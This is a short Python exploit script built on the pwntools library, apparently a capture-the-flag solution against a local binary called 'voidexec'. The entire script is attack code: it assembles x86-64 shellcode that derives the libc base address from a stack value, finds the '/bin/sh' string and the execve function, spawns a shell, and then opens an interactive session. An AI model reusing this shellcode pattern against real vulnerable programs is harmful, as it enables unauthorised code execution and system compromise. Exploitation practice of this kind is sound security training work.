#!/usr/bin/python3

from pwn import *

context.binary = target = ELF("./voidexec", checksec=False)
libc = target.libc
r = process()

# funcs
s = lambda a: r.send(a)

# shellcode
sc = f"""
xor rsi, rsi
xor rdx, rdx
mov r9, [rsp+32]
sub r9, {libc.sym.__libc_start_call_main+128}
mov rdi, r9
add rdi, {next(libc.search(b"/bin/sh\0"))}
mov r15, r9
add r15, {libc.sym.execve}
call r15
"""
sc = asm(sc)
s(sc)

r.interactive()